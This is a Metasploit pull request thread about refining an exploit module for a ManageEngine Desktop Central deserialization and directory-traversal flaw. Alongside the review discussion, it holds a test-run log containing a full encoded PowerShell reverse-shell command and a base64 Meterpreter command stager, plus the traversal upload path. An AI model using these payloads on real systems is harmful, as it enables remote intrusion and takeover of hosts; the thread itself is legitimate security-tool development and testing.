Randomize target directory in desktopcentral_deserialization and apply RuboCop for great justice
rapid7/metasploit-framework pull request #13348
Opened 2020-04-27 21:27 UTC by wvu-r7

Retested with all targets, with and without #11359:

```
msf5 exploit(windows/http/desktopcentral_deserialization) > check
[*] 172.16.249.150:8383 - The target appears to be vulnerable. Desktop Central 100465 is a vulnerable build.
msf5 exploit(windows/http/desktopcentral_deserialization) > set target 0
target => 0
msf5 exploit(windows/http/desktopcentral_deserialization) > run

[*] Started reverse SSL handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Desktop Central 100465 is a vulnerable build.
[*] Executing Windows Command for cmd/windows/powershell_reverse_tcp
[*] Serializing command: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIACxNp14CA51W227jNhB991cMXHUtIRZhG9sWDZBFvUq2DZDuGiu3eTAMhKbGsRqZ9JKUL0j87yUlypLjBNtUL7bI4ZkzZy7UDzASG5TznEMItzLVGjnMdvDR/IxzyVHCO7ika4Q/qEx2rZaxZDoVHH5HHd7ijGUpcg2txxaYx9swuIDPuAm/zP5BpiEc71b4mS7RLGpi7KPCvjImfym8xDnNMx1JTMxOSjNlIDwtczxYjaTY7sgzC7PeWKlsW/ua4qoKrfUIxf6ISrr0y/+TWMuU30+9SCyXlCfd49VYZUzwZ4uXYsMzQZNiNXCYUjBUCpwAS5HkGVqCv/kBlCbpHPzKDYT4DdqzlCftoNgszxVns1QZ+Y3kF8blzvxfEqtaLNgDakXGbHXjLKbvzXN6kChNpbZ+nedi16XoomE3ZAxX2gCW6fBLKvvX6Epco1R4yvgA3Uj5S8yjkXPU7v8yIP2fyeD9r6Tf7townO9WqZ/SEunSki2xiamzuFgzJGt6ZXpKdrZU2i4bDW5KZXEF9go9ZLkp+R2JK1Pf+e96c1NT2PUfvbFB30NIFUyOznzFpdAYodTpPGVU4980SxNqCy+iWTaj7GEaBC/QIcNcL2zV2kND9aIwQSN9tSJ1RE3JJrOdxsl06tlfW3g9QgY98zz9+NjbO1WRJ9W2P9G41QQ5E4mt6vPzYRxdXwdW6Y/Wxm/fmvIUG1XOhniBWQYy59xYg9EhV6ZE23AGHvL1uX3jtsHPzJpJyWGDieUq1/XmHY/EaifT+4UGPwpg0Ov/BH+mTAol5hoiIVdCFvoRGFqP1lKBRONgjQm543fcVaDThNiBhX4dXbfXrV/IDfJ7vWhWTdW/zbo5KZu3STU5m8KNgbTauN4nB55v51qd+iTkFWULw7kEhZQfZkttVdO2j380kgNSRVtOrwopeLrma/GA4dV2ZbRVRu8Dyv64Fd+kRGcUQ8fkuWBxI1iRyYCMqF6Y1c6Hzv9O3WaRZuj7Xlr0QHn8K9LELyu+C70ueEfnAgg5Qu8kt1eWPiZjE8pr15QbD9aEFCFeuZBrFNPk1FJpoLkpVchchQNeGjwrKzMTrJYnCYCwGrcl+ODDuz48wZdchyUqOCmOoAZQCFIBG5G/kwLo1CBbS8RDKYWc9KZHzhqsi33CMqTSD15icNF8MY2/bZ120n8qnxrmu63TLJWTxqnOfMpytTjcwG4MuislyoRCF099J8ZarKqL0HxFtA5fD4fkuGsQQnf72AHyL2c47ABBCQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
[*] Uploading serialized payload
[+] Successfully uploaded serialized payload
[*] Deserializing payload
[+] Successfully deserialized payload
[*] Powershell session session 1 opened (172.16.249.1:4444 -> 172.16.249.150:51359) at 2020-04-27 16:22:54 -0500
^C[!] This exploit may require manual cleanup of '..\webapps\DesktopCentral\_chart\logger.zip' on the target
[*] Exploit completed, but no session was created.
msf5 exploit(windows/http/desktopcentral_deserialization) > set target 1
target => 1
msf5 exploit(windows/http/desktopcentral_deserialization) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Desktop Central 100465 is a vulnerable build.
[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA5JBHdfUV/jn1Ff459RX+OWoMEjn5Ff459RX6Of0V/jnQ96o58RX+OdD3ujnxFf45SaWNofUV/jgAAAAAAAAAAAAAAAAAAAABQRQAAZIYDAH08xksAAAAAAAAAAPAAIwALAgEAADAAAAAQAAAAAAAAAEAAAAAQAAAAAABAAQAAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAEBCAABIAgAAIAEBAAIAAIAAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAADIQQAAbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhCAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAE4QAAAAEAAAABIAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACEAAAAADAAAAACAAAAFgAAAAAAAAAAAAAAAAAAQAAAQC52b3ZsAAAAQAIAAABAAAAABAAAABgAAAAAAAAAAAAAAAAAACAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiD7ChJx8FAAAAAScfAADAAAEjHwgAQAABIM8noJxAAAEjHwQAQAABIvkEQAEABAAAASIv486T/0EgzyegBEAAAUEFZTE9BRDoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\\WCjco.b64", "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\\WCjco.b64", "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [...]

2020-04-27 21:47 UTC, gwillcox-r7 requested changes
Minor changes needed, overall looks good though!

2020-04-27 21:47 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/desktopcentral_deserialization.md
> +> that, the complete fix for the remote code execution vulnerability is
"In continuation of that" <- I'm sure you can come up with better terminology than this and honestly I'm not sure you what your continuing here as the last sentence doesn't really leave anything hanging, its a statement through and through.

Perhaps this would be better?

"The short-term fix for the arbitrary file upload vulnerability was released in build 10.0.474 on January 20, 2020. The complete fix for the remote code execution vulnerability was released later, on XXXX, with build 10.0.479"

2020-04-27 21:47 UTC, gwillcox-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +          that, the complete fix for the remote code execution vulnerability is
See comment above, same terminology fixes should be applied here.

2020-04-27 21:47 UTC, gwillcox-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +    unless build&.match(/\d+/)
Normally I would say yes to this, but that .text is in a conditional case with &. and as discussed at https://github.com/rapid7/metasploit-framework/pull/13347, `get_html_document.at` somehow returns `false` for some odd reason this could mess stuff up.

Anyway thats my thought. So `unless build && build.match(/\d+/)` would work here as you suggested.

2020-04-27 21:47 UTC, gwillcox-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +      "#{rand_text_alpha(8..42)}\\..\\..\\..\\webapps\\DesktopCentral\\_chart"
Looks good, though this is still a standard path its a lot better than using `si` every time. Approved!

2020-04-27 21:48 UTC, wvu-r7 commented on documentation/modules/exploit/windows/http/desktopcentral_deserialization.md
> +> that, the complete fix for the remote code execution vulnerability is
That is quoted from the advisory. I won't change it.

2020-04-27 21:48 UTC, wvu-r7 commented on documentation/modules/exploit/windows/http/desktopcentral_deserialization.md
> +> that, the complete fix for the remote code execution vulnerability is
I will, however, note that it's from the advisory. :)

2020-04-27 21:49 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +          that, the complete fix for the remote code execution vulnerability is
See responses above.

2020-04-27 21:49 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +    unless build&.match(/\d+/)
It doesn't return a Boolean value.

2020-04-27 21:53 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/desktopcentral_deserialization.md
> +> that, the complete fix for the remote code execution vulnerability is
Ah I got confused and thought that the > was part of GitHub's markup for changes made, not part of the file itself. Now I see this was meant to be a quote. My bad, all good and approved!

2020-04-27 21:54 UTC, gwillcox-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +          that, the complete fix for the remote code execution vulnerability is
Yep can see this was a quote now, so all good.

2020-04-27 21:54 UTC, wvu-r7 commented on documentation/modules/exploit/windows/http/desktopcentral_deserialization.md
> +> that, the complete fix for the remote code execution vulnerability is
Fixed. It's been bothering me, anyway, lol. Thanks for the nudge!

2020-04-27 21:58 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +    unless build&.match(/\d+/)
Tbh, even if it returns `true`:

```
2.6.6 :001 > true && true.match(/\d+/)
Traceback (most recent call last):
        4: from /Users/wvu/.rvm/rubies/ruby-2.6.6/bin/irb:23:in `<main>'
        3: from /Users/wvu/.rvm/rubies/ruby-2.6.6/bin/irb:23:in `load'
        2: from /Users/wvu/.rvm/rubies/ruby-2.6.6/lib/ruby/gems/2.6.0/gems/irb-1.0.0/exe/irb:11:in `<top (required)>'
        1: from (irb):1
NoMethodError (undefined method `match' for true:TrueClass)
2.6.6 :002 >
```

cc @adfoster-r7

2020-04-27 22:07 UTC, gwillcox-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +    unless build&.match(/\d+/)
```
2.6.6 :001 > true&.match(/\d+/)
Traceback (most recent call last):
        4: from /Users/gwillcox/.rvm/rubies/ruby-2.6.6/bin/irb:23:in `<main>'
        3: from /Users/gwillcox/.rvm/rubies/ruby-2.6.6/bin/irb:23:in `load'
        2: from /Users/gwillcox/.rvm/rubies/ruby-2.6.6/lib/ruby/gems/2.6.0/gems/irb-1.0.0/exe/irb:11:in `<top (required)>'
        1: from (irb):1
NoMethodError (undefined method `match' for true:TrueClass)
2.6.6 :002 > false&.match(/\d+/)
Traceback (most recent call last):
        5: from /Users/gwillcox/.rvm/rubies/ruby-2.6.6/bin/irb:23:in `<main>'
        4: from /Users/gwillcox/.rvm/rubies/ruby-2.6.6/bin/irb:23:in `load'
        3: from /Users/gwillcox/.rvm/rubies/ruby-2.6.6/lib/ruby/gems/2.6.0/gems/irb-1.0.0/exe/irb:11:in `<top (required)>'
        2: from (irb):2
        1: from (irb):2:in `rescue in irb_binding'
NoMethodError (undefined method `match' for false:FalseClass)
2.6.6 :003 > false && false.match(/\d+/)
 => false 
2.6.6 :004 > true && true.match(/\d+/)
Traceback (most recent call last):
        4: from /Users/gwillcox/.rvm/rubies/ruby-2.6.6/bin/irb:23:in `<main>'
        3: from /Users/gwillcox/.rvm/rubies/ruby-2.6.6/bin/irb:23:in `load'
        2: from /Users/gwillcox/.rvm/rubies/ruby-2.6.6/lib/ruby/gems/2.6.0/gems/irb-1.0.0/exe/irb:11:in `<top (required)>'
        1: from (irb):4
NoMethodError (undefined method `match' for true:TrueClass)
```
Well it does prevent one error case from happening at least. Though this probably something to link to #13347 as a point of note.

Anyways up to you but personally I think the points here are mostly the same as those we discussed before with the exception being the addition of the `true` case failing for both methods. My point was more to try prevent stack traces and favor graceful termination wherever possible.

2020-04-27 22:07 UTC, gwillcox-r7 approved these changes
Looks good

2020-04-27 22:07 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/desktopcentral_deserialization.md
> +Quoting the vendor's advisory on fixed versions:
Approved

2020-04-27 22:07 UTC, gwillcox-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +          Quoting the vendor's advisory on fixed versions:
Approved

2020-04-27 22:09 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +    unless build&.match(/\d+/)
Except one gracefully terminates in a false negative. `¯\_(ツ)_/¯`

2020-04-27 22:14 UTC, gwillcox-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +    unless build&.match(/\d+/)
You.....have a point here, didn't realize that. Thanks for talking this through @wvu-r7! In light of that, will go ahead and merge this in so long. Better to fail and be accurate than produce false results as you correctly pointed out.

2020-04-27 22:14 UTC, gwillcox-r7 commented
After further discussion with @wvu-r7, all issues are resolved. Merging this in now.

2020-04-27 22:15 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +    unless build&.match(/\d+/)
Hell, I don't even like `&.` or `||=` as we've discussed. I'm happy to change this to the more understandable form, especially now that #13347 has landed, and I don't have to obey RuboCop on it.

I think leaving the previous `&.` is fine because I _prefer_ to see a stack trace if _that_ API changes, instead of a silent failure.

There is only so much we can do without automated testing, too.

2020-04-27 22:18 UTC, merged

2020-04-27 22:26 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +    unless build&.match(/\d+/)
To clarify and reiterate, I think we definitely prefer graceful failures for the user experience, but we don't like hiding implementation bugs either. In some cases, I'd rather see an error than a false negative. An error is something I can fix, while a false negative might never be reported.

It's a fine line to walk, and it's made much more difficult because we can't do rigorous automatic testing of module code. Maybe @adfoster-r7 and team can figure out something crafty, but it's always been a long shot.

2020-04-28 01:12 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +      "#{rand_text_alpha(8..42)}\\..\\..\\..\\webapps\\DesktopCentral\\_chart"
I'm pretty sure `si` stands for Source Incite, @mr_me's company. `si` was probably an intentional IOC he added to his PoC. :-)

That said, I don't think a prefix is necessary at all due to the nature of the directory traversal. I'll be removing it shortly if all goes well.

2020-04-28 01:13 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +      "#{rand_text_alpha(8..42)}\\..\\..\\..\\webapps\\DesktopCentral\\_chart"
I'm pretty sure `si` stands for Source Incite, @stevenseeley's company. `si` was probably an intentional IOC he added to his PoC. :-)

That said, I don't think a prefix is necessary at all due to the nature of the directory traversal. I'll be removing it shortly if all goes well.

2020-04-28 01:28 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +      "#{rand_text_alpha(8..42)}\\..\\..\\..\\webapps\\DesktopCentral\\_chart"
```
                String localDirToStore = baseDir + File.separator + "mdm-logs" + File.separator + customerID
                        + File.separator + deviceName + "_" + udid;                                                             // 3
```

```
wvu@kharak:~$ realpath -m /mdm-logs/foo/barsi/../../../webapps/DesktopCentral/_chart
/webapps/DesktopCentral/_chart
wvu@kharak:~$ realpath -m /mdm-logs/foo/bar/../../../webapps/DesktopCentral/_chart
/webapps/DesktopCentral/_chart
wvu@kharak:~$
```

2020-04-28 01:32 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +      "#{rand_text_alpha(8..42)}\\..\\..\\..\\webapps\\DesktopCentral\\_chart"
```
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.150:50092) at 2020-04-27 20:31:59 -0500
```

2020-04-28 01:40 UTC, wvu-r7 commented on modules/exploits/windows/http/desktopcentral_deserialization.rb
> +      "#{rand_text_alpha(8..42)}\\..\\..\\..\\webapps\\DesktopCentral\\_chart"
#13350

2020-04-28 02:27 UTC, wvu-r7 commented
Directory traversal prefixed removed altogether in ##13350. Merged myself after testing.

2020-04-28 02:28 UTC, wvu-r7 commented
Directory traversal prefixed removed altogether in #13350. Merged myself after testing.